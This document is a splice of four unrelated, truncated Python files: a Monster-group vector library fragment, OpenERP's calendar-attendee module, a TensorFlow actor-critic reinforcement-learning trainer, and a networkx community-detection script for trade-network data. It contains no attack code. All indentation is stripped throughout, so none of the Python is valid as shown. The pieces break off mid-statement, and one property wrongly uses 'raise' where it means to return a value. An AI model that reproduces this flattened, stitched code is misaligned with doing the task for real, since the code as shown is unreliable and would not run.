raise TypeError("Bad length of byte data vector")
b = np.array(b % p, dtype = np.uint8)
v =self.zero(p)
mm_aux_bytes_to_mmv(p, b, v.data)
return v
#######################################################################
# Checking and reducing a vector
#######################################################################
def check(self, v1):
"""Check the vector 'self'.
Raise ValueError if an error is found in vector 'self'.
"""
if len(v1.data) != v1.ops.MMV_INTS + 1:
err = "MM vector has wrong length"
raise MemoryError(err)
if v1.data[-1] != PROTECT_OVERFLOW:
err = "Buffer overflow in MM vector detected"
raise MemoryError(err)
result = mm_aux_check_mmv(v1.p, v1.data)
#print("check result is", result)
if not result:
return
try:
err = self.check_errors[result]
except:
err = "Unknown error %d in MM vector" % result
print("\n%s!\n" % err)
raise ValueError("Error in MM vector")
def reduce(self, v1):
"""Convert vector v1 to a unique reduced form"""
mm_aux_reduce_mmv(v1.p, v1.data)
return v1
#######################################################################
# Conversion between tags and indices
#######################################################################
@classmethod
def tuple_to_index(cls, tag, i0 = -1, i1 = -1):
r"""Convert tuple ``(tag, i0, i1)`` to a linear index
Remarks:
The tuple ``('D', i0)`` is accepted as a shorthand for
``('A', i0,i0)``.
A tuple ``('E', i0)`` means a linear index ``i0``, i.e.
this method returns ``i0`` on input ``('E', i0)``, for
``0 <= i0 < 196884``.
If ``tag`` is an instance of class |MMVector|, which is
a nonzero multiple of a basis vector, then the linear index
corresponding to that basis vector is returned.
"""
i = 0
if isinstance(tag, str) and len(tag) == 1:
t = TAGS.find(tag)
if t >= 1 and 0 <= i0 < 2048 and 0 <= i1 < 64:
i = (t << 25) + (i0 << 14) + (i1 << 8)
elif tag == "E" and 0 <= i0 < 196884:
return i0
elif tag == "D" and 0 <= i0 < 24:
i = (1 << 25) + (i0 << 14) + (i0 << 8)
elif isinstance(tag, MMVector):
sp = tag.as_sparse()
if len(sp) == 1:
i = sp[0]
else:
err = "MM vector is not multiple of basis vector"
raise ValueError(err)
else:
raise TypeError("Cannot convert object to MM vector index")
i_ext = mm_aux_index_sparse_to_extern(i)
if 0 <= i_ext < 196884:
return i_ext
err = "Could not convert tuple with tag %s to MM vector index"
| |
<filename>openerp/addons/base_calendar/base_calendar.py
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime, timedelta, date
from dateutil import parser
from dateutil import rrule
from dateutil.relativedelta import relativedelta
from openerp.osv import fields, osv
from openerp.service import web_services
from openerp.tools.translate import _
import pytz
import re
import time
from operator import itemgetter
from openerp import tools, SUPERUSER_ID
months = {
1: "January", 2: "February", 3: "March", 4: "April", \
5: "May", 6: "June", 7: "July", 8: "August", 9: "September", \
10: "October", 11: "November", 12: "December"
}
def get_recurrent_dates(rrulestring, exdate, startdate=None, exrule=None):
"""
Get recurrent dates based on Rule string considering exdate and start date.
@param rrulestring: rulestring
@param exdate: list of exception dates for rrule
@param startdate: startdate for computing recurrent dates
@return: list of Recurrent dates
"""
def todate(date):
val = parser.parse(''.join((re.compile('\d')).findall(date)))
return val
if not startdate:
startdate = datetime.now()
if not exdate:
exdate = []
rset1 = rrule.rrulestr(str(rrulestring), dtstart=startdate, forceset=True)
for date in exdate:
datetime_obj = todate(date)
rset1._exdate.append(datetime_obj)
if exrule:
rset1.exrule(rrule.rrulestr(str(exrule), dtstart=startdate))
return list(rset1)
def base_calendar_id2real_id(base_calendar_id=None, with_date=False):
"""
Convert a "virtual/recurring event id" (type string) into a real event id (type int).
E.g. virtual/recurring event id is 4-20091201100000, so it will return 4.
@param base_calendar_id: id of calendar
@param with_date: if a value is passed to this param it will return dates based on value of withdate + base_calendar_id
@return: real event id
"""
if base_calendar_id and isinstance(base_calendar_id, (str, unicode)):
res = base_calendar_id.split('-')
if len(res) >= 2:
real_id = res[0]
if with_date:
real_date = time.strftime("%Y-%m-%d %H:%M:%S", \
time.strptime(res[1], "%Y%m%d%H%M%S"))
start = datetime.strptime(real_date, "%Y-%m-%d %H:%M:%S")
end = start + timedelta(hours=with_date)
return (int(real_id), real_date, end.strftime("%Y-%m-%d %H:%M:%S"))
return int(real_id)
return base_calendar_id and int(base_calendar_id) or base_calendar_id
def get_real_ids(ids):
if isinstance(ids, (str, int, long)):
return base_calendar_id2real_id(ids)
if isinstance(ids, (list, tuple)):
res = []
for id in ids:
res.append(base_calendar_id2real_id(id))
return res
def real_id2base_calendar_id(real_id, recurrent_date):
"""
Convert a real event id (type int) into a "virtual/recurring event id" (type string).
E.g. real event id is 1 and recurrent_date is set to 01-12-2009 10:00:00, so
it will return 1-20091201100000.
@param real_id: real event id
@param recurrent_date: real event recurrent date
@return: string containing the real id and the recurrent date
"""
if real_id and recurrent_date:
recurrent_date = time.strftime("%Y%m%d%H%M%S", \
time.strptime(recurrent_date, "%Y-%m-%d %H:%M:%S"))
return '%d-%s' % (real_id, recurrent_date)
return real_id
def _links_get(self, cr, uid, context=None):
"""
Get request link.
@param cr: the current row, from the database cursor
@param uid: the current user's ID for security checks
@param context: a standard dictionary for contextual values
@return: list of dictionary which contain object and name and id
"""
obj = self.pool.get('res.request.link')
ids = obj.search(cr, uid, [])
res = obj.read(cr, uid, ids, ['object', 'name'], context=context)
return [(r['object'], r['name']) for r in res]
html_invitation = """
<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<title>%(name)s</title>
</head>
<body>
<table border="0" cellspacing="10" cellpadding="0" width="100%%"
style="font-family: Arial, Sans-serif; font-size: 14">
<tr>
<td width="100%%">Hello,</td>
</tr>
<tr>
<td width="100%%">You are invited for <i>%(company)s</i> Event.</td>
</tr>
<tr>
<td width="100%%">Below are the details of event. Hours and dates expressed in %(timezone)s time.</td>
</tr>
</table>
<table cellspacing="0" cellpadding="5" border="0" summary=""
style="width: 90%%; font-family: Arial, Sans-serif; border: 1px Solid #ccc; background-color: #f6f6f6">
<tr valign="center" align="center">
<td bgcolor="DFDFDF">
<h3>%(name)s</h3>
</td>
</tr>
<tr>
<td>
<table cellpadding="8" cellspacing="0" border="0"
style="font-size: 14" summary="Eventdetails" bgcolor="f6f6f6"
width="90%%">
<tr>
<td width="21%%">
<div><b>Start Date</b></div>
</td>
<td><b>:</b></td>
<td>%(start_date)s</td>
<td width="15%%">
<div><b>End Date</b></div>
</td>
<td><b>:</b></td>
<td width="25%%">%(end_date)s</td>
</tr>
<tr valign="top">
<td><b>Description</b></td>
<td><b>:</b></td>
<td colspan="3">%(description)s</td>
</tr>
<tr valign="top">
<td>
<div><b>Location</b></div>
</td>
<td><b>:</b></td>
<td colspan="3">%(location)s</td>
</tr>
<tr valign="top">
<td>
<div><b>Event Attendees</b></div>
</td>
<td><b>:</b></td>
<td colspan="3">
<div>
<div>%(attendees)s</div>
</div>
</td>
</tr>
</table>
</td>
</tr>
</table>
<table border="0" cellspacing="10" cellpadding="0" width="100%%"
style="font-family: Arial, Sans-serif; font-size: 14">
<tr>
<td width="100%%">From:</td>
</tr>
<tr>
<td width="100%%">%(user)s</td>
</tr>
<tr valign="top">
<td width="100%%">-<font color="a7a7a7">-------------------------</font></td>
</tr>
<tr>
<td width="100%%"> <font color="a7a7a7">%(sign)s</font></td>
</tr>
</table>
</body>
</html>
"""
class calendar_attendee(osv.osv):
"""
Calendar Attendee Information
"""
_name = 'calendar.attendee'
_description = 'Attendee information'
_rec_name = 'cutype'
__attribute__ = {}
def _get_address(self, name=None, email=None):
"""
Gives email information in ical CAL-ADDRESS type format.
@param name: name for CAL-ADDRESS value
@param email: email address for CAL-ADDRESS value
"""
if name and email:
name += ':'
return (name or '') + (email and ('MAILTO:' + email) or '')
def _compute_data(self, cr, uid, ids, name, arg, context=None):
"""
Compute data on function fields for attendee values.
@param cr: the current row, from the database cursor
@param uid: the current user's ID for security checks
@param ids: list of calendar attendee's IDs
@param name: name of field
@param context: a standard dictionary for contextual values
@return: dictionary of form {id: {'field Name': value'}}
"""
name = name[0]
result = {}
for attdata in self.browse(cr, uid, ids, context=context):
id = attdata.id
result[id] = {}
if name == 'sent_by':
if not attdata.sent_by_uid:
result[id][name] = ''
continue
else:
result[id][name] = self._get_address(attdata.sent_by_uid.name, \
attdata.sent_by_uid.email)
if name == 'cn':
if attdata.user_id:
result[id][name] = attdata.user_id.name
elif attdata.partner_id:
result[id][name] = attdata.partner_id.name or False
else:
result[id][name] = attdata.email or ''
if name == 'delegated_to':
todata = []
for child in attdata.child_ids:
if child.email:
todata.append('MAILTO:' + child.email)
result[id][name] = ', '.join(todata)
if name == 'delegated_from':
fromdata = []
for parent in attdata.parent_ids:
if parent.email:
fromdata.append('MAILTO:' + parent.email)
result[id][name] = ', '.join(fromdata)
if name == 'event_date':
if attdata.ref:
result[id][name] = attdata.ref.date
else:
result[id][name] = False
if name == 'event_end_date':
if attdata.ref:
result[id][name] = attdata.ref.date_deadline
else:
result[id][name] = False
if name == 'sent_by_uid':
if attdata.ref:
result[id][name] = (attdata.ref.user_id.id, attdata.ref.user_id.name)
else:
result[id][name] = uid
if name == 'language':
user_obj = self.pool.get('res.users')
lang = user_obj.read(cr, uid, uid, ['lang'], context=context)['lang']
result[id][name] = lang.replace('_', '-') if lang else False
return result
def _links_get(self, cr, uid, context=None):
"""
Get request link for ref field in calendar attendee.
@param cr: the current row, from the database cursor
@param uid: the current user's id for security checks
@param context: A standard dictionary for contextual values
@return: list of dictionary which contain object and name and id
"""
obj = self.pool.get('res.request.link')
ids = obj.search(cr, uid, [])
res = obj.read(cr, uid, ids, ['object', 'name'], context=context)
return [(r['object'], r['name']) for r in res]
def _lang_get(self, cr, uid, context=None):
"""
Get language for language selection field.
@param cr: the current row, from the database cursor
@param uid: the current user's id for security checks
@param context: a standard dictionary for contextual values
@return: list of dictionary which contain code and name and id
"""
obj = self.pool.get('res.lang')
ids = obj.search(cr, uid, [])
res = obj.read(cr, uid, ids, ['code', 'name'], context=context)
res = [((r['code']).replace('_', '-').lower(), r['name']) for r in res]
return res
_columns = {
'cutype': fields.selection([('individual', 'Individual'), \
('group', 'Group'), ('resource', 'Resource'), \
('room', 'Room'), ('unknown', 'Unknown') ], \
'Invite Type', help="Specify the type of Invitation"),
'member': fields.char('Member', size=124,
help="Indicate the groups that the attendee belongs to"),
'role': fields.selection([('req-participant', 'Participation required'), \
('chair', 'Chair Person'), \
('opt-participant', 'Optional Participation'), \
('non-participant', 'For information Purpose')], 'Role', \
help='Participation role for the calendar user'),
'state': fields.selection([('needs-action', 'Needs Action'),
('tentative', 'Uncertain'),
('declined', 'Declined'),
('accepted', 'Accepted'),
('delegated', 'Delegated')], 'Status', readonly=True, \
help="Status of the attendee's participation"),
'rsvp': fields.boolean('Required Reply?',
help="Indicats whether the favor of a reply is requested"),
'delegated_to': fields.function(_compute_data, \
string='Delegated To', type="char", size=124, store=True, \
multi='delegated_to', help="The users that the original \
request was delegated to"),
'delegated_from': fields.function(_compute_data, string=\
'Delegated From', type="char", store=True, size=124, multi='delegated_from'),
'parent_ids': fields.many2many('calendar.attendee', 'calendar_attendee_parent_rel', \
'attendee_id', 'parent_id', 'Delegrated From'),
'child_ids': fields.many2many('calendar.attendee', 'calendar_attendee_child_rel', \
'attendee_id', 'child_id', 'Delegrated To'),
'sent_by': fields.function(_compute_data, string='Sent By', \
type="char", multi='sent_by', store=True, size=124, \
| |
<filename>training/RL.py
import tensorflow as tf
from tensorflow.keras.layers import Dense, LSTM
from tensorflow.keras.backend import set_value
import numpy as np
from tensorflow.keras.activations import relu, softmax
from copy import deepcopy
from config.loader import Default
from game.state import PlayerState
class Distribution(object):
def __init__(self, dim):
self._dim = dim
self._tiny = 1e-8
@property
def dim(self):
raise self._dim
def kl(self, old_dist, new_dist):
"""
Compute the KL divergence of two distributions
"""
raise NotImplementedError
def likelihood_ratio(self, x, old_dist, new_dist):
raise NotImplementedError
def entropy(self, dist):
raise NotImplementedError
def log_likelihood_sym(self, x, dist):
raise NotImplementedError
def log_likelihood(self, xs, dist):
raise NotImplementedError
class Categorical(Distribution):
def kl(self, old_prob, new_prob):
"""
Compute the KL divergence of two Categorical distribution as:
p_1 * (\log p_1 - \log p_2)
"""
return tf.reduce_sum(
old_prob * (tf.math.log(old_prob + self._tiny) - tf.math.log(new_prob + self._tiny)))
def likelihood_ratio(self, x, old_prob, new_prob):
return (tf.reduce_sum(new_prob * x) + self._tiny) / (tf.reduce_sum(old_prob * x) + self._tiny)
def log_likelihood(self, x, param):
"""
Compute log likelihood as:
\log \sum(p_i * x_i)
:param x (tf.Tensor or np.ndarray): Values to compute log likelihood
:param param (Dict): Dictionary that contains probabilities of outputs
:return (tf.Tensor): Log probabilities
"""
probs = param["prob"]
assert probs.shape == x.shape, \
"Different shape inputted. You might have forgotten to convert `x` to one-hot vector."
return tf.math.log(tf.reduce_sum(probs * x, axis=1) + self._tiny)
def sample(self, probs, amount=1):
# NOTE: input to `tf.random.categorical` is log probabilities
# For more details, see https://www.tensorflow.org/versions/r2.0/api_docs/python/tf/random/categorical
# [probs.shape[0], 1]
# tf.print(probs, tf.math.log(probs), tf.random.categorical(tf.math.log(probs), amount), summarize=-1)
return tf.cast(tf.map_fn(lambda p: tf.cast(tf.random.categorical(tf.math.log(p), amount), tf.float32), probs),
tf.int64)
def entropy(self, probs):
return -tf.reduce_sum(probs * tf.math.log(probs + self._tiny), axis=1)
class CategoricalActor(tf.keras.Model):
'''
Actor model class
'''
def __init__(self, action_dim, epsilon, layer_dims, default_activation='elu',
name="CategoricalActor"):
super().__init__(name=name)
self.dist = Categorical(dim=action_dim)
self.action_dim = action_dim
self.epsilon = epsilon
self.denses = [Dense(dim, activation=default_activation, dtype="float32", name='dense_%d' % i)
for i, dim in enumerate(layer_dims)]
self.prob = Dense(action_dim, dtype='float32', name="prob", activation="softmax")
def _compute_feature(self, features):
for layer in self.denses:
features = layer(features)
return features
def _compute_dist(self, states):
"""
Compute categorical distribution
:param states (np.ndarray or tf.Tensor): Inputs to neural network.
NN outputs probabilities of K classes
:return: Categorical distribution
"""
features = self._compute_feature(states)
probs = self.prob(features) * (1.0 - self.epsilon) + self.epsilon / np.float32(self.action_dim)
return probs
def get_action(self, state):
assert isinstance(state, np.ndarray)
is_single_state = len(state.shape) == 1
state = state[np.newaxis][np.newaxis].astype(
np.float32) if is_single_state else state
action, probs = self._get_action_body(tf.constant(state))
return (action.numpy()[0][0], probs.numpy()) if is_single_state else (action, probs)
@tf.function
def _get_action_body(self, state):
probs = self._compute_dist(state)
action = tf.squeeze(self.dist.sample(probs), axis=1)
return action, probs
def get_probs(self, states):
return self._compute_dist(states)
def compute_entropy(self, states):
param = self._compute_dist(states)
return self.dist.entropy(param)
class Policy(tf.keras.Model, Default):
'''
Actor model class
'''
def __init__(self, action_dim, layer_dims, lstm_dim, default_activation='elu',
name="CategoricalActor"):
super().__init__(name=name)
Default.__init__(self)
self.dist = Categorical(dim=action_dim)
self.action_dim = action_dim
self.has_lstm = lstm_dim > 0
if lstm_dim > 0:
self.lstm = LSTM(lstm_dim, time_major=False, dtype='float32', stateful=True, return_sequences=True,
return_state=True, name='lstm')
else :
self.lstm = None
self.denses = [Dense(dim, activation=default_activation, dtype="float32", name='dense_%d' % i)
for i, dim in enumerate(layer_dims)]
self.prob = Dense(action_dim, dtype='float32', name="prob", activation="softmax")
@tf.function
def init_body(self, features):
if self.has_lstm:
features, hidden_h, hidden_c = self.lstm(features)
for layer in self.denses:
features = layer(features)
features = self.prob(features)
return hidden_h, hidden_c
else:
for layer in self.denses:
features = layer(features)
features = self.prob(features)
return None, None
def _compute_feature(self, features):
if self.has_lstm:
features, hidden_h, hidden_c = self.lstm(features)
for layer in self.denses:
features = layer(features)
return features, (hidden_h, hidden_c)
else:
for layer in self.denses:
features = layer(features)
return features, (None, None)
def _compute_dist(self, states):
"""
Compute categorical distribution
:param states (np.ndarray or tf.Tensor): Inputs to neural network.
NN outputs probabilities of K classes
:return: Categorical distribution
"""
features, hidden_states = self._compute_feature(states)
probs = self.prob(features) * (1.0 - self.EPSILON_GREEDY) + self.EPSILON_GREEDY / np.float32(self.action_dim)
return probs, hidden_states
@tf.function
def _get_action_body(self, state):
probs, hidden_states = self._compute_dist(state)
action = tf.squeeze(self.dist.sample(probs), axis=1)
return action, probs, hidden_states
def __call__(self, state):
action, probs, (hidden_h, hidden_c) = self._get_action_body(state[np.newaxis][np.newaxis])
return action.numpy()[0][0], probs.numpy(), hidden_h.numpy()[0], hidden_c.numpy()[0]
def set_params(self, params):
for dense, param in zip(self.denses, params['actor_core']):
dense.set_weights(param)
self.prob.set_weights(params['actor_head'])
if self.has_lstm:
self.lstm.set_weights(params['lstm'])
def get_params(self):
actor_weights = [dense.get_weights() for dense in self.denses]
return {
'lstm' : self.lstm.get_weights() if self.has_lstm else None,
'actor_core': actor_weights,
'actor_head': self.prob.get_weights(),
}
class ActionStateProbs(tf.keras.Model):
'''
Unconditional model representing probability distribution for each action state.
'''
def __init__(self, name='action_state_probs'):
super().__init__(name=name)
self.probs = tf.Variable(tf.fill([1, PlayerState.action_state_dim], 1.), dtype=tf.float32)
def get(self):
return softmax(self.probs)
class V(tf.keras.Model):
"""
Value model function
"""
def __init__(self, layer_dims, default_activation='elu', name='vf'):
super().__init__(name=name)
# self.l1 = Dense(128, activation='elu', dtype='float32', name="v_L1")
#self.l1 = GRU(512, time_major=False, dtype='float32', stateful=True, return_sequences=True)
self.denses = [Dense(dim, activation=default_activation, dtype='float32') for dim in layer_dims]
self.v = Dense(1, activation='linear', dtype='float32', name="v")
def call(self, states):
features = states
for layer in self.denses:
features = layer(features)
return self.v(features)
class AC(tf.keras.Model, Default):
def __init__(self, action_dim, layer_dims,
lstm_dim):
super(AC, self).__init__(name='AC')
Default.__init__(self)
self.action_dim = action_dim
self.has_lstm = lstm_dim > 0
if lstm_dim == 0:
self.lstm = None
else:
self.lstm = LSTM(lstm_dim, time_major=False, dtype='float32', stateful=False, return_sequences=True,
return_state=False, name='lstm')
self.dense_body = Dense(layer_dims[0], activation='elu', dtype='float32')
self.V = V(layer_dims[1:])
self.policy = CategoricalActor(action_dim, self.epsilon_greedy, layer_dims[1:])
self.as_probs = ActionStateProbs()
self.p_optim = tf.keras.optimizers.SGD(learning_rate=1.)
#self.optim = tf.keras.optimizers.RMSprop(rho=0.99, epsilon=1e-5) # Learning rate is affected when training
self.optim = tf.keras.optimizers.Adam(beta_1=0.9, beta_2=0.98, epsilon=1e-8, clipvalue=4e-3)
self.step = tf.Variable(0, dtype=tf.int32)
self.range_ = tf.expand_dims(tf.tile(tf.expand_dims(tf.range(self.TRAJECTORY_LENGTH-1, dtype=tf.int32), axis=0), [self.BATCH_SIZE, 1]),
axis=2)
self.pattern = tf.expand_dims([tf.fill((self.TRAJECTORY_LENGTH-1,), i) for i in range(self.BATCH_SIZE)], axis=2)
def train(self, log_name, training_params, as_entropy_scale, states, actions, rewards, probs, hidden_states, gpu):
# do some stuff with arrays
# print(states, actions, rewards, dones)
# Set both networks with corresponding initial recurrent state
self.optim.learning_rate.assign(training_params['learning_rate'])
v_loss, mean_entropy, min_entropy, max_entropy, min_logp, max_logp, grad_norm, as_entropy \
= self._train(tf.cast(training_params['entropy_cost'], tf.float32), tf.cast(training_params['gamma'], tf.float32),
tf.cast(as_entropy_scale, tf.float32), states, actions, rewards, probs, hidden_states, gpu)
print(v_loss, max_entropy, mean_entropy, grad_norm)
tf.summary.scalar(name=log_name + "/v_loss", data=v_loss)
tf.summary.scalar(name=log_name + "/as_ent", data=as_entropy)
tf.summary.scalar(name=log_name + "/min_entropy", data=min_entropy)
tf.summary.scalar(name=log_name + "/max_entropy", data=max_entropy)
tf.summary.scalar(name=log_name + "/mean_entropy", data=mean_entropy)
tf.summary.scalar(name=log_name + "/ent_scale", data=training_params['entropy_cost'])
tf.summary.scalar(name=log_name + "/gamma", data=training_params['gamma'])
tf.summary.scalar(name=log_name + "/learning_rate", data=training_params['learning_rate'])
tf.summary.scalar(name=log_name + "/min_logp", data=min_logp)
tf.summary.scalar(name=log_name + "/max_logp", data=max_logp)
tf.summary.scalar(name=log_name + "/grad_norm", data=grad_norm)
#tf.summary.scalar(name="misc/distance", data=tf.reduce_mean(states[:, :, -1]))
tf.summary.scalar(name=log_name + "/reward", data=tf.reduce_sum(tf.reduce_mean(rewards, axis=0)))
return mean_entropy
@tf.function
def _train(self, alpha, gamma, as_entropy_scale, states, actions, rewards, probs, hidden_states, gpu):
'''
Main training function
'''
with tf.device("/gpu:{}".format(gpu) if gpu >= 0 else "/cpu:0"):
actions = tf.cast(actions, dtype=tf.int32)
with tf.GradientTape() as tape:
# Update the action_state probability distribution
as_probs = self.as_probs.get()[0]
action_states = tf.cast(tf.argmax(states[:, :-1,
PlayerState.onehot_offsets['action_state']:
PlayerState.onehot_offsets['action_state'] + PlayerState.action_state_dim], axis=2), dtype=tf.int32)
taken_as = tf.gather_nd(as_probs, tf.expand_dims(action_states, axis=2), batch_dims=0)
NLL = -tf.math.log(taken_as + 1e-8)
loss = tf.reduce_mean(NLL)
grad = tape.gradient(loss, self.as_probs.trainable_variables)
self.p_optim.apply_gradients(zip(grad, self.as_probs.trainable_variables))
# Reward rare action_states with their negative log likelihood
rewards += tf.clip_by_value(NLL - tf.math.log(400.0), clip_value_min=0.0,
clip_value_max=10.0) * as_entropy_scale
as_ent = tf.reduce_mean(tf.reduce_sum(tf.multiply(-tf.math.log(as_probs+1e-8), as_probs), -1))
with tf.GradientTape() as tape:
# Optimize the actor and critic
hidden = tf.where(tf.math.is_nan(hidden_states), tf.zeros_like(hidden_states), hidden_states)
if self.has_lstm:
lstm_states = self.lstm(states, initial_state=[hidden[:,0],hidden[:, 1]])
else:
lstm_states = states
lstm_states = self.dense_body(lstm_states)
v_all = self.V(lstm_states)[: ,:, 0]
p = self.policy.get_probs(lstm_states[:, :-1])
kl = tf.divide(p, probs+1e-3)#tf.reduce_sum(p * tf.math.log(tf.divide(p, probs)), axis=-1)
indices = tf.concat(values=[self.pattern, self.range_, tf.expand_dims(actions, axis=2)], axis=2)
rho_mu = tf.minimum(1., tf.gather_nd(kl, indices, batch_dims=0))
targets = self.compute_trace_targets(v_all, rewards, rho_mu, gamma)
#targets = self.compute_gae(v_all[:, :-1], rewards[:, :-1], v_all[:, -1])
advantage = tf.stop_gradient(targets) - v_all
v_loss = tf.reduce_mean(tf.square(advantage))
p_log = tf.math.log(p + 1e-8)
ent = - tf.reduce_sum(tf.multiply(p_log, p), -1)
taken_p_log = tf.gather_nd(p_log, indices, batch_dims=0)
p_loss = - tf.reduce_mean( tf.stop_gradient(rho_mu) * taken_p_log * tf.stop_gradient(targets[:, 1:]*gamma + rewards - v_all[:, :-1]) + alpha * ent)
#taken_p_log * tf.stop_gradient(advantage) + self.entropy_scale * ent)
total_loss = 0.5 * v_loss + p_loss
grad = tape.gradient(total_loss, self.policy.trainable_variables + self.dense_body.trainable_variables
+ self.V.trainable_variables
+ self.lstm.trainable_variables)
# x is used to track the gradient size
x = 0.0
c = 0.0
for gg in grad:
c += 1.0
x += tf.reduce_mean(tf.abs(gg))
x /= c
self.optim.apply_gradients(zip(grad, self.policy.trainable_variables + self.dense_body.trainable_variables
+ self.V.trainable_variables + self.lstm.trainable_variables))
self.step.assign_add(1)
mean_entropy = tf.reduce_mean(ent)
min_entropy = tf.reduce_min(ent)
max_entropy = tf.reduce_max(ent)
return v_loss, mean_entropy, min_entropy, p_loss, tf.reduce_min(
p_log), tf.reduce_max(p_log), x, as_ent
def compute_gae(self, v, rewards, last_v, gamma):
v = tf.transpose(v)
rewards = tf.transpose(rewards)
reversed_sequence = [tf.reverse(t, [0]) for t in [v, rewards]]
def bellman(future, present):
val, r = present
return (1. - self.gae_lambda) * val + self.gae_lambda * (
r + gamma * future)
returns = tf.scan(bellman, reversed_sequence, last_v)
returns = tf.reverse(returns, [0])
returns = tf.transpose(returns)
return returns
def compute_trace_targets(self, v, | |
<gh_stars>1-10
# This script will use community detection algorithms from networkx.community module
# (and maybe other modules too) to find communities in the Global Trade Network data.
#
# (0). Import packages and libraries
import numpy as np
import networkx as nx
import community as c # python-louvain module
import sklearn.cluster as skc
import sklearn.metrics as skm
import matplotlib.pyplot as plt
import utils.data_manipulation as dm
import utils.network_manipulation as nm
import utils.plot_functions as pf
# import matplotlib.cm as cm
# import pandas as pd
# from mpl_toolkits.mplot3d import Axes3D
# import time
# import os
# import csv
# import sys
# import scipy as sp # library to deal with sparse graphs for Cuthill-Mckee and Laplacian
#------------------------------------------------------------------------------------------------------------
# Load in a network for a specific year
dirPre = dm.set_dir_tree()
year = np.array(1962)
flg_sym = True
G = nm.construct_ntwrkX_Graph(dirPre=dirPre, year=year, flg_sym=flg_sym)
#------------------------------------------------------------------------------------------------------------
# Explore 'community' module
# Compute best partition and dendrogram using Louvain algorithm in 'community' module
res = [0.1,0.5,1,3,5,7,10] # different resolution values for partitioning algorithms
q_bp = np.zeros_like(res)
q_dend = np.zeros( (3,len(res)) )
coverage = np.zeros_like(res)
for i,r in enumerate(res):
print('Resolution is ',r)
#
# (1). compute partitions
part = c.best_partition(G, partition=None, weight='weight', resolution=r, randomize=False)
dend = c.generate_dendrogram(G, part_init=None, weight='weight', resolution=r, randomize=False)
print('Tree depth is ',len(dend))
#
# (2). compute partition quality metrics
# (a). 'modularity'
q_bp[i] = c.modularity(part, G, weight='weight')
q_dend[0,i] = c.modularity(dend[0], G, weight='weight')
#
# # (b). 'coverage' - (note: have to turn partition into a list of sets.)
# # ???? NOT WORKING AND NOT SURE WHY.
# partsList = []
# numParts = part.get( max(part,key=part.get) )
# for p in range( numParts ):
# partsList.append( set([i for i,j in part.items() if j == p]) )
# coverage[i] = nx.community.coverage(G, partsList)
#
#
#
#
# Looking further into dendrogram. Makes sense.
try:
G2 = c.induced_graph(dend[0], G, weight='weight') # define graph turns clusters into nodes.
q_dend[1,i] = c.modularity(dend[1], G2, weight='weight')
pp = c.partition_at_level(dend,1) # express partition at a give layer in terms of all nodes.
q_dend[2,i] = c.modularity(pp, G, weight='weight')
except:
continue
# Plot modularity metric for different partitions at different resolution parameters.
if False:
plt.plot(res,q_bp,'b')
plt.plot(res,q_dend[0],'r')
plt.plot(res,q_dend[1],'g')
plt.plot(res,q_dend[2],'k')
plt.xlabel('Resolution')
plt.ylabel('modularity')
plt.legend(['best partition','dendrogram0','dendrogram1a','dendrogram1b'])
plt.show()
# Plot coverage metric
if True:
plt.plot(res,coverage,'b')
plt.xlabel('Resolution')
plt.ylabel('Coverage')
plt.legend(['best partition'])
plt.show()
#------------------------------------------------------------------------------------------------------------
# Explore networkx's community partitioning
# # # # # # CONSTRUCTING GRAPHS WITH COMMUNITY STRUCTURE TO TEST ALGORITHMS
#
# (1). LFR_benchmark_graph - construct graph for testing community detection algorithms. Define degree distributions,
# community size distributions, strength of edges in graph and in communities.
#
# (2). nx.community.community_generators. - whole library of generators for graphs with community structure
#
#
#
#
# # # # # # CLUSTERING ALGORITHMS
#
# (1). kernighan_lin_bisection - algorithm iteratively swaps pairs of nodes to reduce the edge cut between the two sets.
#
# (2). asyn_fluidc - asynchronous fluid communities algorithm (k = # communities to find)
# Note: have to find Giant Connected Component first.
# part = nx.community.asyn_fluidc(G, k=5, max_iter=100)
#
# (3). girvan_newman - Finds communities in a graph using the Girvan–Newman method.
# from operator import itemgetter
# G = nx.path_graph(10)
# edges = G.edges()
# nx.set_edge_attributes(G, {(u, v): v for u, v in edges}, 'weight')
# def heaviest(G):
# u, v, w = max(G.edges(data='weight'), key=itemgetter(2))
# return (u, v)
#
# comp = girvan_newman(G, most_valuable_edge=heaviest)
# tuple(sorted(c) for c in next(comp))
#
# (4). asyn_lpa_communities - asynchronous label propagation community detection algorithm
# nx.community.asyn_lpa_communities(G, weight=None)
#
# (5). label_propagation_communities - Generates community sets determined by label propagation
# part = nx.community.label_propagation_communities(G)
#
# (6). k_clique_communities - Find k-clique communities in graph using the percolation method.
# union of all cliques of size k that can be reached through adjacent (sharing k-1 nodes) k-cliques.
# nx.community.k_clique_communities(G, k, cliques=None)
#
#
#
#
# # # # # # CLUSTER QUALITY METRICS
#
# (1). coverage - quality measure of a partition: ratio of intra-community edges to the total edges in the graph.
#
# (2). performance - ratio of intra-community edges plus inter-community non-edges with the total number of potential edges.
# perf = nx.community.performance(G, partition)
#
# (3). modularity - Returns the modularity of the given partition of the graph.
# mod = nx.community.modularity(G, communities, weight='weight')
#
# (4). nx.community.quality.intra_community_edges
#
# (5). nx.community.quality.inter_community_edges
#
# (6). nx.community.quality.inter_community_non_edges
# # OTHER NETWORKX STUFF THAT WILL BE USEFUL
# nx.fruchterman_reingold_layout - nice density based graph visualization.
# nx.AmbiguousSolution nx.edge_disjoint_paths nx.multiline_adjlist
# nx.DiGraph nx.edge_expansion nx.mycielski
# nx.ExceededMaxIterations nx.edge_load_centrality nx.mycielski_graph
# nx.Graph nx.edge_subgraph nx.mycielskian
# nx.GraphMLReader nx.edgedfs nx.navigable_small_world_graph
# nx.GraphMLWriter nx.edgelist nx.negative_edge_cycle
# nx.HasACycle nx.edges nx.neighbor_degree
# nx.LCF_graph nx.effective_size nx.neighbors
# nx.MultiDiGraph nx.efficiency nx.network_simplex
# nx.MultiGraph nx.ego nx.networkx
# nx.NetworkXAlgorithmError nx.ego_graph nx.newman_watts_strogatz_graph
